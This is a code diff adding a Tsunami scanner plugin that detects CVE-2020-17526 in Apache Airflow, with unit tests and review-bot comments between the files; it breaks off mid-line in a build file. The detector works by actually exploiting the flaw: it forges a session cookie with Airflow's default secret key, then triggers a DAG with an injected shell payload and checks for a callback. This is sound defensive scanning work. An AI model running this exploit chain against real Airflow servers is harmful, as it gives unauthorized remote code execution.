+import static java.lang.annotation.ElementType.PARAMETER;
+
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+import javax.inject.Qualifier;
+
+/** Annotation for {@link Cve202017526Detector}. */
+final class Annotations {
+ @Qualifier
+ @Retention(RetentionPolicy.RUNTIME)
+ @Target({PARAMETER, METHOD, FIELD})
+ @interface OobSleepDuration {}
+
+ private Annotations() {}
+}
diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526Detector.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526Detector.java
new file mode 100644
index 000000000..6fd3dedc7
--- /dev/null
+++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526Detector.java
@@ -0,0 +1,268 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.cve202017526; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpRequest; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugins.cve202017526.Annotations.OobSleepDuration; +import 
com.google.tsunami.plugins.cve202017526.flasksessionsigner.FlaskSessionSigner; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.net.HttpCookie; +import java.net.URLEncoder; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import javax.inject.Inject; + +/** A VulnDetector plugin for CVE 202017526. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE-2020-17526 Detector", + version = "0.1", + description = + "This detector checks for occurrences of CVE-2020-17526 in apache airflow installations.", + author = "am0o0", + bootstrapModule = Cve202017526DetectorModule.class) +@ForWebService +public final class Cve202017526Detector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final Pattern CSRF_PATTERN = Pattern.compile("var CSRF = \"([\\d\\w-.]+)\""); + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + private final int oobSleepDuration; + + @Inject + Cve202017526Detector( + @UtcClock Clock utcClock, + HttpClient httpClient, + PayloadGenerator payloadGenerator, + @OobSleepDuration int oobSleepDuration) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(true).build(); + this.oobSleepDuration = oobSleepDuration; + this.payloadGenerator = 
checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + var payload = getTsunamiCallbackHttpPayload(); + if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log( + "Tsunami callback server is not setup for this environment, cannot run CVE-2020-17526" + + " Detector."); + return false; + } + + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + try { + // 1. sending the first request to retrieve a valid CSRF token and a valid cookie + Map results = getFreshCsrfTokenAndSessionCookie(networkService); + if (results == null) { + return false; + } + String freshSessionCookieValue = results.get("freshSessionCookieValue"); + String freshCsrfToken = results.get("freshCsrfToken"); + + // 2. enabling the vulnerable DAG + this.httpClient.send( + HttpRequest.post( + rootUrl + "admin/airflow/paused?is_paused=true&dag_id=example_trigger_target_dag") + .setHeaders( + HttpHeaders.builder() + .addHeader("Cookie", String.format("session=%s", freshSessionCookieValue)) + .addHeader("X-CSRFToken", freshCsrfToken) + .build()) + .build(), + networkService); + + // 3. 
sending the RCE payload + results = getFreshCsrfTokenAndSessionCookie(networkService); + if (results == null) { + return false; + } + + freshSessionCookieValue = results.get("freshSessionCookieValue"); + freshCsrfToken = results.get("freshCsrfToken"); + + String urlEncodedBody = + "csrf_token=CSRFTOKEN&dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag&conf=%7B%22message%22%3A%22%60PAYLOAD%60%22%7D" + .replace("CSRFTOKEN", freshCsrfToken); + urlEncodedBody = + urlEncodedBody.replace("PAYLOAD", URLEncoder.encode(payload.getPayload(), UTF_8)); + + this.httpClient.send( + HttpRequest.post( + rootUrl + + "admin/airflow/trigger?dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag") + .setHeaders( + HttpHeaders.builder() + .addHeader("Cookie", String.format("session=%s", freshSessionCookieValue)) + .addHeader("X-CSRFToken", freshCsrfToken) + .addHeader("Content-Type", "application/x-www-form-urlencoded") + .build()) + .setRequestBody(ByteString.copyFromUtf8(urlEncodedBody)) + .build(), + networkService); + + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration)); + + return payload.checkIfExecuted(); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } + + private Map getFreshCsrfTokenAndSessionCookie(NetworkService networkService) + throws IOException { + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + Map results = new HashMap<>(); + + FlaskSessionSigner newToken = + new FlaskSessionSigner( + "{\"_fresh\":true,\"user_id\":1,\"_permanent\":true}", + "Zzx63w", + "temporary_key", + "cookie-session"); + + HttpResponse firstResponse = + this.httpClient.send( + HttpRequest.get(rootUrl + "admin/") + .setHeaders( + HttpHeaders.builder() + .addHeader("Cookie", String.format("session=%s", newToken.dumps())) + .build()) + .build(), + networkService); + if 
(!(firstResponse.headers().get("Set-Cookie").isPresent() + && firstResponse.bodyString().isPresent() + && firstResponse.bodyString().get().contains("Airflow - DAGs"))) { + return null; + } + List parsedCookies = + HttpCookie.parse(firstResponse.headers().get("Set-Cookie").get()); + String freshSessionCookieValue = null; + for (HttpCookie cookie : parsedCookies) { + if (cookie.getName().equals("session")) { + freshSessionCookieValue = cookie.getValue(); + } + } + if (freshSessionCookieValue == null) { + return null; + } + results.put("freshSessionCookieValue", freshSessionCookieValue); + + Matcher m = CSRF_PATTERN.matcher(firstResponse.bodyString().get()); + if (!m.find()) { + return null; + } + String freshCsrfToken = m.group(1); + results.put("freshCsrfToken", freshCsrfToken); + return results; + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build()); + } catch (NotImplementedException n) { + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2020-17526")) + .setSeverity(Severity.CRITICAL) + .setTitle( + "CVE-2020-17526 Authentication bypass lead to Arbitrary Code Execution in" + + " Apache Airflow 
prior to 1.10.14") + .setDescription( + "An attacker can bypass the authentication and then use a default DAG to" + + " execute arbitrary code on the server hosting the apache airflow" + + " application.") + .setRecommendation( + "update to version 1.10.14. Also, you can change the default value for the" + + " '[webserver] secret_key' config to a securely generated random value to" + + " sign the cookies with a non-default secret key.")) + .build(); + } +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorConfigs.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorConfigs.java new file mode 100644 index 000000000..ec57cf8c5 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorConfigs.java @@ -0,0 +1,23 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.cve202017526; + +import com.google.tsunami.common.config.annotations.ConfigProperties; + +@ConfigProperties("plugins.community.detectors.apache_airflow_cve_2020_17526") +final class Cve202017526DetectorConfigs { + int oobSleepDuration; +} 
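Review bot: The responses to both POSTs in `isServiceVulnerable` (step 2 and step 3) are discarded, so the detector sleeps for the full `oobSleepDuration` even when the target has rejected the request. Unless a non-success status is expected from a vulnerable target, capture the step 3 result with `HttpResponse triggerResponse = this.httpClient.send(...);` and return early with `if (!triggerResponse.status().isSuccess()) { return false; }`. Step 2 also changes the pause state of `example_trigger_target_dag` on the scanned host and nothing visible in this hunk restores it, so the `@PluginInfo` description should state that the scan is not read-only. `getFreshCsrfTokenAndSessionCookie` signals failure with `null` and success with a map keyed by string literals; a small value class or `Optional` would make the three `results == null` checks harder to forget.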
diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorModule.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorModule.java new file mode 100644 index 000000000..46019e832 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorModule.java @@ -0,0 +1,37 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.cve202017526; + +import com.google.inject.Provides; +import com.google.tsunami.plugin.PluginBootstrapModule; +import com.google.tsunami.plugins.cve202017526.Annotations.OobSleepDuration; + +/** A module registering the detector for CVE-2020-17526. */ +public final class Cve202017526DetectorModule extends PluginBootstrapModule { + @Override + protected void configurePlugin() { + registerPlugin(Cve202017526Detector.class); + } + + @Provides + @OobSleepDuration + int provideOobSleepDuration(Cve202017526DetectorConfigs configs) { + if (configs.oobSleepDuration == 0) { + return 20; + } + return configs.oobSleepDuration; + } +} 
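Review bot: `provideOobSleepDuration` treats only `0` as "not configured", so a negative value from the config reaches `Duration.ofSeconds(oobSleepDuration)` in the detector. The callback check would then presumably run with no effective wait and miss a real callback. Guard with `if (configs.oobSleepDuration <= 0) { return 20; }` and name the default, e.g. `private static final int DEFAULT_OOB_SLEEP_SECONDS = 20;`, with a comment stating that the unit is seconds.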
diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/FlaskSessionSigner.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/FlaskSessionSigner.java new file mode 100644 index 000000000..5ff2c349d --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/FlaskSessionSigner.java @@ -0,0 +1,24 @@ +package com.google.tsunami.plugins.cve202017526.flasksessionsigner; + +import java.util.Base64; + +public class FlaskSessionSigner { + public final String timestamp; + public String payload; + public byte[] separator; + public TokenSigner signer; + + public FlaskSessionSigner(String payload, String timestamp, String secret, String salt) { + this.separator = new byte[] {(byte) '.'}; + this.payload = payload; + this.timestamp = timestamp; + this.signer = new TokenSigner(secret.getBytes(), salt.getBytes(), this.separator); + } + + public String dumps() { + byte[] header = Base64.getUrlEncoder().withoutPadding().encode(payload.getBytes()); + String message = + String.format("%s%s%s", new String(header), new String(this.separator), this.timestamp); + return new String(signer.sign(message.getBytes())); + } +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/TokenSigner.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/TokenSigner.java new file mode 100644 index 000000000..4b4891888 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/TokenSigner.java 
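Review bot: `FlaskSessionSigner` converts between strings and bytes with the platform default charset (`payload.getBytes()`, `secret.getBytes()`, `salt.getBytes()`, `new String(header)`, `message.getBytes()`), so the signed value can differ on a host whose default encoding is not UTF-8. Pass the charset explicitly, e.g. `payload.getBytes(UTF_8)` and `return new String(signer.sign(message.getBytes(UTF_8)), UTF_8);`, using the same static import of `StandardCharsets.UTF_8` the detector class already has. The file has no license header, although the repository README requires one on every source file. The public mutable fields `payload`, `separator` and `signer` could be `private final`, and the class needs a Javadoc describing the four constructor arguments.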
@@ -0,0 +1,60 @@ +package com.google.tsunami.plugins.cve202017526.flasksessionsigner; + +import com.google.common.primitives.Bytes; +import java.security.InvalidKeyException; +import java.security.NoSuchAlgorithmException; +import java.util.Base64; +import javax.crypto.Mac; +import javax.crypto.spec.SecretKeySpec; + +public class TokenSigner implements Cloneable { + public String digestMethod; + public byte[] secret_key; + public byte[] salt; + public byte[] sep; + + public TokenSigner(byte[] secret_key, byte[] salt, byte[] sep) { + this.digestMethod = "HmacSHA1"; + this.secret_key = secret_key; + this.salt = salt; + this.sep = sep; + } + + public byte[] derive_key() throws Exception { + try { + SecretKeySpec signingKey = new SecretKeySpec(secret_key, digestMethod); + Mac mac = Mac.getInstance(digestMethod); + mac.init(signingKey); + return mac.doFinal(salt); + } catch (NoSuchAlgorithmException e) { + throw new Exception("No such derivation algorithm"); + } catch (InvalidKeyException e) { + throw new Exception("Invalid derivation key"); + } + } + + public byte[] get_signature(byte[] value) { + try { + byte[] key = derive_key(); + SecretKeySpec signingKey = new SecretKeySpec(key, digestMethod); + Mac mac = Mac.getInstance(digestMethod); + mac.init(signingKey); + byte[] sig = mac.doFinal(value); + return Base64.getUrlEncoder().withoutPadding().encode(sig); + } catch (Exception e) { + return new byte[] {}; + } + } + + public byte[] sign(byte[] value) { + return Bytes.concat(value, sep, get_signature(value)); + } + + public TokenSigner clone() { + try { + return (TokenSigner) super.clone(); + } catch (CloneNotSupportedException e) { + throw new AssertionError(); + } + } +} 
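Review bot: `get_signature` catches every `Exception` and returns an empty array, so a failed HMAC computation produces a token with an empty signature and the detector would report the target as not vulnerable without logging anything. `derive_key` likewise throws a bare `Exception` and drops the original cause. Both can go through one private helper that rethrows as an unchecked exception with the cause attached, as sketched below. The unused `Cloneable`/`clone()` and the snake_case names (`secret_key`, `derive_key`, `get_signature`) also depart from the Java style of the rest of the commit, and the license header is missing.

```java
public byte[] derive_key() {
  return hmac(secret_key, salt);
}

public byte[] get_signature(byte[] value) {
  return Base64.getUrlEncoder().withoutPadding().encode(hmac(derive_key(), value));
}

/** Computes the MAC of {@code data} under {@code key} using {@code digestMethod}. */
private byte[] hmac(byte[] key, byte[] data) {
  try {
    Mac mac = Mac.getInstance(digestMethod);
    mac.init(new SecretKeySpec(key, digestMethod));
    return mac.doFinal(data);
  } catch (NoSuchAlgorithmException | InvalidKeyException e) {
    // Fail loudly: an empty signature would silently turn into a false negative.
    throw new IllegalStateException("Cannot compute " + digestMethod, e);
  }
}

// … unchanged: sign(), fields and constructor …
```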
diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/test/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorTest.java b/community/detectors/apache_airflow_cve_2020_17526/src/test/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorTest.java new file mode 100644 index 000000000..f526424fa --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/test/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorTest.java 
@@ -0,0 +1,242 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.cve202017526; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.inject.testing.fieldbinder.Bind; +import com.google.inject.testing.fieldbinder.BoundFieldModule; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.plugins.cve202017526.Annotations.OobSleepDuration; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; 
+import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Objects; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for the {@link Cve202017526Detector}. */ +@RunWith(JUnit4.class) +public final class Cve202017526DetectorTest { + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Bind(lazy = true) + @OobSleepDuration + private int sleepDuration = 1; + + @Inject private Cve202017526Detector detector; + + private void createInjector() { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + Modules.override(new Cve202017526DetectorModule()).with(BoundFieldModule.of(this))) + .injectMembers(this); + } + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + } + + @After + public void tearDown() throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_withCallbackServer_onVulnerableTarget_returnsVulnerability() + throws IOException { + startMockWebServer(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + 
NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + assertThat(detectionReports.getDetectionReportsList()) + .comparingExpectedFieldsOnly() + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2020-17526")) + .setSeverity(Severity.CRITICAL) + .setTitle( + "CVE-2020-17526 Authentication bypass lead to Arbitrary Code Execution" + + " in Apache Airflow prior to 1.10.14") + .setDescription( + "An attacker can bypass the authentication and then use a default DAG" + + " to execute arbitrary code on the server hosting the apache" + + " airflow application.") + .setRecommendation( + "update to version 1.10.14. 
Also, you can change the default value for" + + " the '[webserver] secret_key' config to a securely generated" + + " random value to sign the cookies with a non-default secret" + + " key.")) + .build()); + } + + @Test + public void detect_withCallbackServer_butNoCallback_returnsEmpty() throws IOException { + startMockWebServer(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + @Test + public void detect_withoutCallbackServer_returnsEmpty() throws IOException { + mockTargetService.start(); + mockTargetService.url("/"); + + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + mockTargetService.enqueue(new MockResponse().setResponseCode(500)); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + createInjector(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private void startMockWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + + @Override + public 
MockResponse dispatch(RecordedRequest request) { + switch (request.getPath()) { + // fall through + case "/admin/": + return new MockResponse() + .setResponseCode(200) + .addHeader("Set-Cookie: session=aaaaaa") + .setBody("Airflow - DAGs \n var CSRF = \"bbbbbb\""); + case "/admin/airflow/paused?is_paused=true&dag_id=example_trigger_target_dag": + if (Objects.requireNonNull(request.getHeaders().get("X-CSRFToken")).equals("bbbbbb") + && Objects.requireNonNull(request.getHeaders().get("Cookie")) + .equals("session=aaaaaa")) { + return new MockResponse().setResponseCode(200); + } + // fall through + case "/admin/airflow/trigger?dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag": + if (Objects.requireNonNull(request.getHeaders().get("X-CSRFToken")).equals("bbbbbb") + && Objects.requireNonNull(request.getHeaders().get("Cookie")) + .equals("session=aaaaaa") + && request + .getBody() + .toString() + .contains("dag_id=example_trigger_target_dag&origin=")) { + return new MockResponse().setResponseCode(200); + } + // fall through + default: + return new MockResponse().setResponseCode(400); + } + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + } +} diff --git a/community/detectors/apache_airflow_exposed_ui/README.md b/community/detectors/apache_airflow_exposed_ui/README.md new file mode 100644 index 000000000..c35bc5c63 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/README.md @@ -0,0 +1,16 @@ +# Exposed Apache Airflow Detector + +This plugin for Tsunami detects publicly exposed apache airflow instances. First +it tries to receive a callback to the tsunami callback server and if it failed, +it sends an HTTP request to an API endpoint to match the response with a +pattern. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. 
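Review bot: `detect_withoutCallbackServer_returnsEmpty` does not exercise the no-callback-server branch, because `createInjector()` always calls `setCallbackServer(mockCallbackServer)`; the test appears to pass only because the target answers 500 and `getFreshCsrfTokenAndSessionCookie` returns null. Either build the injector for this test with a payload generator module that has no callback server configured, or rename it to something like `detect_whenTargetReturnsServerError_returnsEmpty` and add a separate case for the warning path. In the dispatcher, the `// fall through` comment before `case "/admin/":` has nothing to fall through from. The `/admin/airflow/paused...` case also drops into the trigger case when its header check fails, where `Objects.requireNonNull` would throw on a missing header. An explicit `return new MockResponse().setResponseCode(400);` after each `if` states the intent.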
diff --git a/community/detectors/apache_airflow_exposed_ui/build.gradle b/community/detectors/apache_airflow_exposed_ui/build.gradle new file mode 100644 index 000000000..e414d3371 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/build.gradle 
@@ -0,0 +1,70 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami detector for exposed apache airflow server.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + guiceVersion = '4.2.3' + jsoupVersion = '1.9.2' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation "org.jsoup:jsoup:${jsoupVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.inject:guice:${guiceVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation 
